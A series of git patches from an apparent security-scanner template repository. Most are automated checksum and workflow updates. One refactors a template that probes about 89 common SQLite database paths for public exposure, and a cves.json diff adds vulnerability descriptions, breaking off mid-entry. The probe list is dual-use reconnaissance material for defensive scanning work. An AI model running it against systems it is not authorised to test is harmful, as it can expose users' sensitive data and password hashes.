http/cves/2024/CVE-2024-1071.yaml:672dd1ef0240ede4f06d3b98caf96f2f14bd1e8e http/cves/2024/CVE-2024-1208.yaml:6f0363cecc95a2187f9fbca30620a2d39d87eb15 http/cves/2024/CVE-2024-1209.yaml:36f848394da33f75c2198b8f5b9081f212b3ecd1 http/cves/2024/CVE-2024-1210.yaml:1333fe26c55e1b4e44bcfdc0e0de5226a053f949 -http/cves/2024/CVE-2024-1212.yaml:048e1190f404d00105e446714c22fd44431bd387 +http/cves/2024/CVE-2024-1212.yaml:5671b80e9ab3c9274bd98bbeb8fe508980393f85 http/cves/2024/CVE-2024-1698.yaml:86f5580473ce4a829a4279af9ad763b52bfd4983 http/cves/2024/CVE-2024-1709.yaml:7f5ad668e9c8e5ab56afee96df8907d7ccc71e0b http/cves/2024/CVE-2024-21644.yaml:e8d58594c2dc1021f9107eee925f11791e0627e7 @@ -8171,7 +8172,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:ea62e7a3ece798218348e5276776aff198c9f2f8 +templates-checksum.txt:1cf7b285b6ad21a0ff4d01a0703cb9c5ac5025b4 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 5e5a61558a591c234f4df647dcbfe6bebc54d17f Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Wed, 20 Mar 2024 04:58:18 +0000 Subject: [PATCH 26/86] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index da7f634231..191c720b88 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -3,6 +3,7 @@ on: push: paths: - '.new-additions' + - 'dns/soa-detect.yaml' - 'file/keys/dependency/dependency-track.yaml' - 'file/keys/docker/dockerhub-pat.yaml' - 'file/keys/doppler/doppler-audit.yaml' From 73e65180af38a5be575a0f501212642d8ac7a734 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 20 Mar 2024 04:59:02 +0000 Subject: [PATCH 27/86] Auto Generated Templates Checksum [Wed Mar 20 04:59:02 UTC 2024] :robot: --- templates-checksum.txt | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 3b84c9da72..33a64481b4 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -125,6 +125,7 @@ dns/servfail-refused-hosts.yaml:ee2505b5619921a20332494f2281664eaf01fa87 dns/soa-detect.yaml:1d167b28182dd5423e0327242761e0ecfb886658 dns/spoofable-spf-records-ptr.yaml:7cb8aa2d5fa1b19224a6ca0b17c5b46377892ee7 dns/txt-fingerprint.yaml:eca4bcdfb25f2922e233e4801f1beb27893f7e70 +dns/txt-service-detect.yaml:9a941b2fa182292c0b9bd2f9d549a953c469c9f8 dns/worksites-detection.yaml:c54ce778fe66a138e794b87520392f285c8b6259 file/android/adb-backup-enabled.yaml:4ca96a12120754577166567e047e6735d1214891 file/android/biometric-detect.yaml:27a81bc01a126a6923c702d556dac9da857971d8 @@ -8172,7 +8173,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:1cf7b285b6ad21a0ff4d01a0703cb9c5ac5025b4 +templates-checksum.txt:c89e2365557cf78a0e2ea79cd9143ae9b2bbd42f wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From bff5fe145aaf1e3b27e836f64675039c7a60cc15 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Wed, 20 Mar 2024 04:59:16 +0000 Subject: [PATCH 28/86] Auto Generated New Template Addition List [Wed Mar 20 04:59:16 UTC 2024] :robot: --- .new-additions | 2 ++ 1 file changed, 2 insertions(+) diff --git a/.new-additions b/.new-additions index 0b99585cdf..cf77a5b53a 100644 --- a/.new-additions +++ b/.new-additions @@ -1,4 +1,5 @@ dns/soa-detect.yaml +dns/txt-service-detect.yaml file/keys/dependency/dependency-track.yaml file/keys/docker/dockerhub-pat.yaml file/keys/doppler/doppler-audit.yaml @@ -44,5 +45,6 @@ http/osint/phishing/kakao-login-phish.yaml http/osint/phishing/naver-login-phish.yaml http/technologies/microsoft/aspnet-version-detect.yaml http/technologies/microsoft/aspnetmvc-version-disclosure.yaml +http/technologies/wing-ftp-service-detect.yaml http/vulnerabilities/landray/landray-eis-ws-infoleak.yaml network/detection/wing-ftp-detect.yaml From 8fa711b73fc4a5ca83531803ac0a88f7120b9f46 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 20 Mar 2024 04:59:22 +0000 Subject: [PATCH 29/86] Auto Template Signing [Wed Mar 20 04:59:22 UTC 2024] :robot: --- dns/soa-detect.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/dns/soa-detect.yaml b/dns/soa-detect.yaml index eb6eda0782..1d98b9fa5d 100644 --- a/dns/soa-detect.yaml +++ b/dns/soa-detect.yaml @@ -81,3 +81,4 @@ dns: name: "edge-cast" words: - "edgecastdns.net" +# digest: 4a0a00473045022052cc795314a697081c68e82277bf2be22ff53410f9a9a69af759ecefcd5b235b022100f94a899ec64709bb1f7d4e648dc091ee40029b754e4cc451882f0ccb68ff4921:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 4c5df2dff27cc89dbefc3d58f1abffa009fab62d Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Wed, 20 Mar 2024 04:59:54 +0000 Subject: [PATCH 30/86] Syncing Templates --- .github/workflows/templates-sync.yml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index 191c720b88..9c636adef9 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -4,6 +4,7 @@ on: paths: - '.new-additions' - 'dns/soa-detect.yaml' + - 'dns/txt-service-detect.yaml' - 'file/keys/dependency/dependency-track.yaml' - 'file/keys/docker/dockerhub-pat.yaml' - 'file/keys/doppler/doppler-audit.yaml' @@ -49,6 +50,7 @@ on: - 'http/osint/phishing/naver-login-phish.yaml' - 'http/technologies/microsoft/aspnet-version-detect.yaml' - 'http/technologies/microsoft/aspnetmvc-version-disclosure.yaml' + - 'http/technologies/wing-ftp-service-detect.yaml' - 'http/vulnerabilities/landray/landray-eis-ws-infoleak.yaml' - 'network/detection/wing-ftp-detect.yaml' workflow_dispatch: From 6bd7a9e020f0d4e640d770d1a2a7a564e3802ae2 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Wed, 20 Mar 2024 12:51:44 +0530 Subject: [PATCH 31/86] updated with path variable --- http/exposures/files/generic-db.yaml | 187 ++++++++++++++------------- 1 file changed, 95 insertions(+), 92 deletions(-) diff --git a/http/exposures/files/generic-db.yaml b/http/exposures/files/generic-db.yaml index 0ac1962fbf..3d0fbff868 100644 --- a/http/exposures/files/generic-db.yaml +++ b/http/exposures/files/generic-db.yaml @@ -42,104 +42,107 @@ info: cvss-score: 7.5 metadata: max-request: 89 - tags: files,database,exposure,sqlite,sqlite3 + tags: files,database,exposure,sqlite,sqlite3,fuzz http: - method: GET path: - # Recommended paths found in framework official docs or unofficial tutorials - - "{{BaseURL}}/database/database.sqlite" - - "{{BaseURL}}/database/production.sqlite" - - "{{BaseURL}}/app/database/production.sqlite" - - "{{BaseURL}}/writable/db.sqlite3" - - "{{BaseURL}}/writable/database.db" - - "{{BaseURL}}/var/app.db" - - "{{BaseURL}}/var/data/db.sqlite" - - "{{BaseURL}}/var/data/data.sqlite" - - "{{BaseURL}}/app/sqlite.db" - - "{{BaseURL}}/sqlite.db" - - "{{BaseURL}}/db.sqlite3" - - "{{BaseURL}}/db/production.sqlite3" - - "{{BaseURL}}/db.sqlite" - - "{{BaseURL}}/mydb.sqlite" - - "{{BaseURL}}/app/data/app_db.sqlite" - - "{{BaseURL}}/app/webroot/database.sqlite" - - "{{BaseURL}}/app/database.sqlite" - - "{{BaseURL}}/application/databases/db.sqlite" - - "{{BaseURL}}/application/db/database.sqlite" - - "{{BaseURL}}/application/Database/db1.db" - - "{{BaseURL}}/application/database/data.db" - - "{{BaseURL}}/data/app.db" - - "{{BaseURL}}/data/sqlite.db" - - "{{BaseURL}}/data/sqlite3.db" - - "{{BaseURL}}/data/database.db" - - "{{BaseURL}}/data/production.db" - - "{{BaseURL}}/storage/database/database.sqlite" - - "{{BaseURL}}/protected/data/app.db" - - "{{BaseURL}}/protected/data/sqlite.db" - - "{{BaseURL}}/protected/data/sqlite3.db" - - "{{BaseURL}}/protected/data/database.db" - - "{{BaseURL}}/protected/data/production.db" - - "{{BaseURL}}/db/database.db" - - "{{BaseURL}}/db/database.sqlite" - - "{{BaseURL}}/app/Model/app.db" - - "{{BaseURL}}/app/Model/sqlite.db" - - "{{BaseURL}}/app/Model/sqlite3.db" - - "{{BaseURL}}/app/Model/database.db" - - "{{BaseURL}}/app/Model/production.db" - # General paths - - "{{BaseURL}}/app.db" - - "{{BaseURL}}/sqlite3.db" - - "{{BaseURL}}/app.sqlite" - - "{{BaseURL}}/app.sqlite3" - - "{{BaseURL}}/database.db" - - "{{BaseURL}}/database.sqlite" - - "{{BaseURL}}/database.sqlite3" - - "{{BaseURL}}/production.db" - - "{{BaseURL}}/production.sqlite" - - "{{BaseURL}}/production.sqlite3" - - "{{BaseURL}}/db/db.sqlite" - - "{{BaseURL}}/db/db.sqlite3" - - "{{BaseURL}}/db/sqlite.db" - - "{{BaseURL}}/db/sqlite3.db" - - "{{BaseURL}}/db/app.db" - - "{{BaseURL}}/db/app.sqlite" - - "{{BaseURL}}/db/app.sqlite3" - - "{{BaseURL}}/db/database.sqlite3" - - "{{BaseURL}}/db/production.db" - - "{{BaseURL}}/db/production.sqlite" - - "{{BaseURL}}/app/db.sqlite" - - "{{BaseURL}}/app/db.sqlite3" - - "{{BaseURL}}/app/sqlite3.db" - - "{{BaseURL}}/app/app.db" - - "{{BaseURL}}/app/app.sqlite" - - "{{BaseURL}}/app/app.sqlite3" - - "{{BaseURL}}/app/database.db" - - "{{BaseURL}}/app/database.sqlite3" - - "{{BaseURL}}/app/production.db" - - "{{BaseURL}}/app/production.sqlite" - - "{{BaseURL}}/app/production.sqlite3" - - "{{BaseURL}}/data/db.sqlite" - - "{{BaseURL}}/data/db.sqlite3" - - "{{BaseURL}}/data/app.sqlite" - - "{{BaseURL}}/data/app.sqlite3" - - "{{BaseURL}}/data/database.sqlite" - - "{{BaseURL}}/data/database.sqlite3" - - "{{BaseURL}}/data/production.sqlite" - - "{{BaseURL}}/data/production.sqlite3" - - "{{BaseURL}}/database/db.sqlite" - - "{{BaseURL}}/database/db.sqlite3" - - "{{BaseURL}}/database/sqlite.db" - - "{{BaseURL}}/database/sqlite3.db" - - "{{BaseURL}}/database/app.db" - - "{{BaseURL}}/database/app.sqlite" - - "{{BaseURL}}/database/app.sqlite3" - - "{{BaseURL}}/database/database.db" - - "{{BaseURL}}/database/database.sqlite3" - - "{{BaseURL}}/database/production.db" - - "{{BaseURL}}/database/production.sqlite3" + - "{{BaseURL}}/{{path}}" + payloads: + path: + - database/database.sqlite + - database/production.db + - database/production.sqlite + - database/production.sqlite3 + - app/database/production.sqlite + - writable/db.sqlite3 + - writable/database.db + - var/app.db + - var/data/db.sqlite + - var/data/data.sqlite + - app/sqlite.db + - sqlite.db + - db.sqlite3 + - db/production.sqlite3 + - db.sqlite + - mydb.sqlite + - app/data/app_db.sqlite + - app/webroot/database.sqlite + - app/database.sqlite + - application/databases/db.sqlite + - application/db/database.sqlite + - application/Database/db1.db + - application/database/data.db + - data/app.db + - data/sqlite.db + - data/sqlite3.db + - data/database.db + - data/production.db + - storage/database/database.sqlite + - protected/data/app.db + - protected/data/sqlite.db + - protected/data/sqlite3.db + - protected/data/database.db + - protected/data/production.db + - db/database.db + - db/database.sqlite + - app/Model/app.db + - app/Model/sqlite.db + - app/Model/sqlite3.db + - app/Model/database.db + - app/Model/production.db + - app.db + - sqlite3.db + - app.sqlite + - app.sqlite3 + - database.db + - database.sqlite + - database.sqlite3 + - production.db + - production.sqlite + - production.sqlite3 + - db/db.sqlite + - db/db.sqlite3 + - db/sqlite.db + - db/sqlite3.db + - db/app.db + - db/app.sqlite + - db/app.sqlite3 + - db/database.sqlite3 + - db/production.db + - db/production.sqlite + - app/db.sqlite + - app/db.sqlite3 + - app/sqlite3.db + - app/app.db + - app/app.sqlite + - app/app.sqlite3 + - app/database.db + - app/database.sqlite3 + - app/production.db + - app/production.sqlite + - app/production.sqlite3 + - data/db.sqlite + - data/db.sqlite3 + - data/app.sqlite + - data/app.sqlite3 + - data/database.sqlite + - data/database.sqlite3 + - data/production.sqlite + - data/production.sqlite3 + - database/db.sqlite + - database/db.sqlite3 + - database/sqlite.db + - database/sqlite3.db + - database/app.db + - database/app.sqlite + - database/app.sqlite3 + - database/database.db + - database/database.sqlite3 + + stop-at-first-match: true matchers: - type: dsl dsl: From cc8ee3aa0fdc3674e60d1055ec47147a63bc2879 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Wed, 20 Mar 2024 13:38:58 +0530 Subject: [PATCH 32/86] minor update --- http/exposures/files/generic-db.yaml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/http/exposures/files/generic-db.yaml b/http/exposures/files/generic-db.yaml index 3d0fbff868..d6f33746df 100644 --- a/http/exposures/files/generic-db.yaml +++ b/http/exposures/files/generic-db.yaml @@ -4,7 +4,8 @@ info: name: Generic Database File - Exposure author: Michal Mikolas (nanuqcz) severity: high - description: This is collection of some web frameworks recommendation or default configuration for SQLite database file location. If this file is publicly accessible due to server misconfiguration, it could result in application data leak including users sensitive data, password hashes etc. + description: | + This is collection of some web frameworks recommendation or default configuration for SQLite database file location. If this file is publicly accessible due to server misconfiguration, it could result in application data leak including users sensitive data, password hashes etc. reference: - https://laravel.com/docs/11.x/database#sqlite-configuration # database/database.sqlite - https://laravel.com/docs/5.2/database # database/database.sqlite From faefc8a92e83377104b005e1790b41da54bc6383 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Wed, 20 Mar 2024 08:12:01 +0000 Subject: [PATCH 33/86] Auto Generated New Template Addition List [Wed Mar 20 08:12:01 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index cf77a5b53a..e60a673523 100644 --- a/.new-additions +++ b/.new-additions @@ -40,6 +40,7 @@ http/exposed-panels/neocase-hrportal-panel.yaml http/exposed-panels/osnexus-panel.yaml http/exposed-panels/posteio-admin-panel.yaml http/exposed-panels/skeepers-panel.yaml +http/exposures/files/generic-db.yaml http/misconfiguration/installer/posteio-installer.yaml http/osint/phishing/kakao-login-phish.yaml http/osint/phishing/naver-login-phish.yaml From 20e58460b4cf676ad29ddf535b79298e1e5495b9 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 20 Mar 2024 08:12:15 +0000 Subject: [PATCH 34/86] Auto Generated Templates Checksum [Wed Mar 20 08:12:15 UTC 2024] :robot: --- templates-checksum.txt | 6 ++++-- 1 file changed, 4 insertions(+), 2 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 33a64481b4..6048164bfe 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -122,7 +122,7 @@ dns/mx-service-detector.yaml:197d6c83e04011fc0ae267e999cad25e85a19d58 dns/nameserver-fingerprint.yaml:7a9247d4f45a9699418b4afed5cea0388b147735 dns/ptr-fingerprint.yaml:ecff55b058dba2ad98432eacea8b52ce1d8e7656 dns/servfail-refused-hosts.yaml:ee2505b5619921a20332494f2281664eaf01fa87 -dns/soa-detect.yaml:1d167b28182dd5423e0327242761e0ecfb886658 +dns/soa-detect.yaml:5c758030190eea7fc6934a23dd266362ee2a355b dns/spoofable-spf-records-ptr.yaml:7cb8aa2d5fa1b19224a6ca0b17c5b46377892ee7 dns/txt-fingerprint.yaml:eca4bcdfb25f2922e233e4801f1beb27893f7e70 dns/txt-service-detect.yaml:9a941b2fa182292c0b9bd2f9d549a953c469c9f8 @@ -4536,6 +4536,7 @@ http/exposures/files/filezilla.yaml:a04a2de7145d42c6cc63a59edf5c13c9660218b5 http/exposures/files/ftpconfig.yaml:37d46a4726edffd9d686224d0a3be7df6ec2780d http/exposures/files/gcloud-access-token.yaml:62d8288a11a5350a01d3e0041ac28c92b7889910 http/exposures/files/gcloud-credentials.yaml:2343f7b00527e9831a765ea61960df72176b1bf1 +http/exposures/files/generic-db.yaml:1f5cc209039fbe3d53d29286d46bea2e8ffada19 http/exposures/files/get-access-token-json.yaml:81c5d4a38a413cda6fbf584f3a955d89dc48a28d http/exposures/files/git-mailmap.yaml:456e18f1c474d4628acc7356b1f816f1fee19fcf http/exposures/files/github-gemfile-files.yaml:451504bab87de4abd36fd46ad03629bdc24ffe5e @@ -6680,6 +6681,7 @@ http/technologies/web-ftp-detect.yaml:ceaf8743ca94c6fbf3e7d380d0ed9be6f3796120 http/technologies/web-suite-detect.yaml:94ce185f9aee3a32ab9391218413ba5b4efd408f http/technologies/weblogic-detect.yaml:57acbd03a2cd58cd94f92843578359a5b479ac5d http/technologies/werkzeug-debugger-detect.yaml:af81a25156ac286ceb63a2599e8b8ddfc6a34542 +http/technologies/wing-ftp-service-detect.yaml:416707a344d027b1224855a9c085642fadcccf38 http/technologies/wms-server-detect.yaml:a12dcf5c63bb483cadc2179824ea7bc811565a9d http/technologies/wondercms-detect.yaml:940ebbd50bb93299d72b2cc4712da95f4dcb24e8 http/technologies/wordpress/plugins/ad-inserter.yaml:e1496850b2a8ebec1b470544d5bb38e52760d900 @@ -8173,7 +8175,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:c89e2365557cf78a0e2ea79cd9143ae9b2bbd42f +templates-checksum.txt:0bd557ae0e24c541eae22a598daa4f74b79cfd0f wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 35c7f1e4671d1fc0a75a3312328919fb92ecb365 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Wed, 20 Mar 2024 08:12:47 +0000 Subject: [PATCH 35/86] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index 9c636adef9..52ff2ed46f 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -45,6 +45,7 @@ on: - 'http/exposed-panels/osnexus-panel.yaml' - 'http/exposed-panels/posteio-admin-panel.yaml' - 'http/exposed-panels/skeepers-panel.yaml' + - 'http/exposures/files/generic-db.yaml' - 'http/misconfiguration/installer/posteio-installer.yaml' - 'http/osint/phishing/kakao-login-phish.yaml' - 'http/osint/phishing/naver-login-phish.yaml' From cbf2c2568d5c60c9b473ee886a1cd07c196d3f8c Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 20 Mar 2024 08:13:55 +0000 Subject: [PATCH 36/86] Auto Template Signing [Wed Mar 20 08:13:55 UTC 2024] :robot: --- dns/txt-service-detect.yaml | 1 + http/exposures/files/generic-db.yaml | 1 + http/technologies/wing-ftp-service-detect.yaml | 1 + 3 files changed, 3 insertions(+) diff --git a/dns/txt-service-detect.yaml b/dns/txt-service-detect.yaml index d286a8d2fe..17a8d5e012 100644 --- a/dns/txt-service-detect.yaml +++ b/dns/txt-service-detect.yaml @@ -218,3 +218,4 @@ dns: name: "whimsical" words: - "whimsical" +# digest: 490a00463044022043132b95ad11ec72665418855d60e0d979abbe9957b18f9170981f4f4af22a72022054d2942e7554851cd1f043f99d5e119ff9e8943a635a891927b1897d270383b9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposures/files/generic-db.yaml b/http/exposures/files/generic-db.yaml index d6f33746df..99da464258 100644 --- a/http/exposures/files/generic-db.yaml +++ b/http/exposures/files/generic-db.yaml @@ -152,3 +152,4 @@ http: - '!contains(body, " Date: Wed, 20 Mar 2024 08:14:48 +0000 Subject: [PATCH 37/86] Auto Generated cves.json [Wed Mar 20 08:14:48 UTC 2024] :robot: --- cves.json | 14 ++++++++++++-- cves.json-checksum.txt | 2 +- 2 files changed, 13 insertions(+), 3 deletions(-) diff --git a/cves.json b/cves.json index 58062848e9..bef7f939af 100644 --- a/cves.json +++ b/cves.json @@ -1386,7 +1386,7 @@ {"ID":"CVE-2021-40149","Info":{"Name":"Reolink E1 Zoom Camera \u003c=3.0.0.716 - Private Key Disclosure","Severity":"medium","Description":"Reolink E1 Zoom Camera versions 3.0.0.716 and below suffer from a private key (RSA) disclosure vulnerability.\n","Classification":{"CVSSScore":"5.9"}},"file_path":"http/cves/2021/CVE-2021-40149.yaml"} {"ID":"CVE-2021-40150","Info":{"Name":"Reolink E1 Zoom Camera \u003c=3.0.0.716 - Information Disclosure","Severity":"high","Description":"Reolink E1 Zoom camera through 3.0.0.716 is susceptible to information disclosure. The web server discloses its configuration via the /conf/ directory that is mapped to a publicly accessible path. An attacker with network-level access to the camera can can download the entire NGINX/FastCGI configurations by querying the /conf/nginx.conf or /conf/fastcgi.conf URI.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2021/CVE-2021-40150.yaml"} {"ID":"CVE-2021-40323","Info":{"Name":"Cobbler \u003c3.3.0 - Remote Code Execution","Severity":"critical","Description":"Cobbler before 3.3.0 allows log poisoning and resultant remote code execution via an XMLRPC method.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2021/CVE-2021-40323.yaml"} -{"ID":"CVE-2021-40438","Info":{"Name":"Apache \u003c= 2.4.48 - Mod_Proxy SSRF","Severity":"critical","Description":"Apache 2.4.48 and below contain an issue where uri-path can cause mod_proxy to forward the request to an origin server chosen by the remote user.","Classification":{"CVSSScore":"9"}},"file_path":"http/cves/2021/CVE-2021-40438.yaml"} +{"ID":"CVE-2021-40438","Info":{"Name":"Apache \u003c= 2.4.48 Mod_Proxy - Server-Side Request Forgery","Severity":"critical","Description":"Apache 2.4.48 and below contain an issue where uri-path can cause mod_proxy to forward the request to an origin server chosen by the remote user.","Classification":{"CVSSScore":"9"}},"file_path":"http/cves/2021/CVE-2021-40438.yaml"} {"ID":"CVE-2021-40539","Info":{"Name":"Zoho ManageEngine ADSelfService Plus v6113 - Unauthenticated Remote Command Execution","Severity":"critical","Description":"Zoho ManageEngine ADSelfService Plus version 6113 and prior are vulnerable to a REST API authentication bypass vulnerability that can lead to remote code execution.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2021/CVE-2021-40539.yaml"} {"ID":"CVE-2021-40542","Info":{"Name":"Opensis-Classic 8.0 - Cross-Site Scripting","Severity":"medium","Description":"Opensis-Classic Version 8.0 is affected by cross-site scripting. An unauthenticated user can inject and execute JavaScript code through the link_url parameter in Ajax_url_encode.php.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2021/CVE-2021-40542.yaml"} {"ID":"CVE-2021-40651","Info":{"Name":"OS4Ed OpenSIS Community 8.0 - Local File Inclusion","Severity":"medium","Description":"OS4Ed OpenSIS Community 8.0 is vulnerable to a local file inclusion vulnerability in Modules.php (modname parameter), which can disclose arbitrary file from the server's filesystem as long as the application has access to the file.\n","Classification":{"CVSSScore":"6.5"}},"file_path":"http/cves/2021/CVE-2021-40651.yaml"} @@ -2171,7 +2171,7 @@ {"ID":"CVE-2023-37728","Info":{"Name":"IceWarp Webmail Server v10.2.1 - Cross Site Scripting","Severity":"medium","Description":"Icewarp Icearp v10.2.1 was discovered to contain a cross-site scripting (XSS) vulnerability via the color parameter.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-37728.yaml"} {"ID":"CVE-2023-37979","Info":{"Name":"Ninja Forms \u003c 3.6.26 - Cross-Site Scripting","Severity":"medium","Description":"The plugin does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-37979.yaml"} {"ID":"CVE-2023-38035","Info":{"Name":"Ivanti Sentry - Authentication Bypass","Severity":"critical","Description":"A security vulnerability in MICS Admin Portal in Ivanti MobileIron Sentry versions 9.18.0 and below, which may allow an attacker to bypass authentication controls on the administrative interface due to an insufficiently restrictive Apache HTTPD configuration.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-38035.yaml"} -{"ID":"CVE-2023-38203","Info":{"Name":"Adobe ColdFusion Deserialization of Untrusted Data","Severity":"critical","Description":"Adobe ColdFusion versions 2018u17 (and earlier), 2021u7 (and earlier) and 2023u1 (and earlier) are affected by a Deserialization of Untrusted Data vulnerability that could result in Arbitrary code execution. Exploitation of this issue does not require user interaction.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-38203.yaml"} +{"ID":"CVE-2023-38203","Info":{"Name":"Adobe ColdFusion - Deserialization of Untrusted Data","Severity":"critical","Description":"Adobe ColdFusion versions 2018u17 (and earlier), 2021u7 (and earlier) and 2023u1 (and earlier) are affected by a Deserialization of Untrusted Data vulnerability that could result in Arbitrary code execution. Exploitation of this issue does not require user interaction.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-38203.yaml"} {"ID":"CVE-2023-38205","Info":{"Name":"Adobe ColdFusion - Access Control Bypass","Severity":"high","Description":"There is an access control bypass vulnerability in Adobe ColdFusion versions 2023 Update 2 and below, 2021 Update 8 and below and 2018 update 18 and below, which allows a remote attacker to bypass the ColdFusion mechanisms that restrict unauthenticated external access to ColdFusion's Administrator.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-38205.yaml"} {"ID":"CVE-2023-3836","Info":{"Name":"Dahua Smart Park Management - Arbitrary File Upload","Severity":"critical","Description":"Dahua wisdom park integrated management platform is a comprehensive management platform, a park operations,resource allocation, and intelligence services,and other functions, including/emap/devicePoint_addImgIco?.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-3836.yaml"} {"ID":"CVE-2023-3843","Info":{"Name":"mooDating 1.2 - Cross-site scripting","Severity":"medium","Description":"A vulnerability was found in mooSocial mooDating 1.2. It has been classified as problematic. Affected is an unknown function of the file /matchmakings/question of the component URL Handler. The manipulation leads to cross site scripting. It is possible to launch the attack remotely. VDB-235194 is the identifier assigned to this vulnerability. NOTE: We tried to contact the vendor early about the disclosure but the official mail address was not working properly.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-3843.yaml"} @@ -2227,6 +2227,7 @@ {"ID":"CVE-2023-42442","Info":{"Name":"JumpServer \u003e 3.6.4 - Information Disclosure","Severity":"medium","Description":"JumpServer is an open source bastion host and a professional operation and maintenance security audit system. Starting in version 3.0.0 and prior to versions 3.5.5 and 3.6.4, session replays can download without authentication. Session replays stored in S3, OSS, or other cloud storage are not affected. The api `/api/v1/terminal/sessions/` permission control is broken and can be accessed anonymously. SessionViewSet permission classes set to `[RBACPermission | IsSessionAssignee]`, relation is or, so any permission matched will be allowed. Versions 3.5.5 and 3.6.4 have a fix. After upgrading, visit the api `$HOST/api/v1/terminal/sessions/?limit=1`. The expected http response code is 401 (`not_authenticated`).\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2023/CVE-2023-42442.yaml"} {"ID":"CVE-2023-42793","Info":{"Name":"JetBrains TeamCity \u003c 2023.05.4 - Remote Code Execution","Severity":"critical","Description":"In JetBrains TeamCity before 2023.05.4 authentication bypass leading to RCE on TeamCity Server was possible\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-42793.yaml"} {"ID":"CVE-2023-43177","Info":{"Name":"CrushFTP \u003c 10.5.1 - Unauthenticated Remote Code Execution","Severity":"critical","Description":"CrushFTP prior to 10.5.1 is vulnerable to Improperly Controlled Modification of Dynamically-Determined Object Attributes.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-43177.yaml"} +{"ID":"CVE-2023-43187","Info":{"Name":"NodeBB XML-RPC Request xmlrpc.php - XML Injection","Severity":"critical","Description":"A remote code execution (RCE) vulnerability in the xmlrpc.php endpoint of 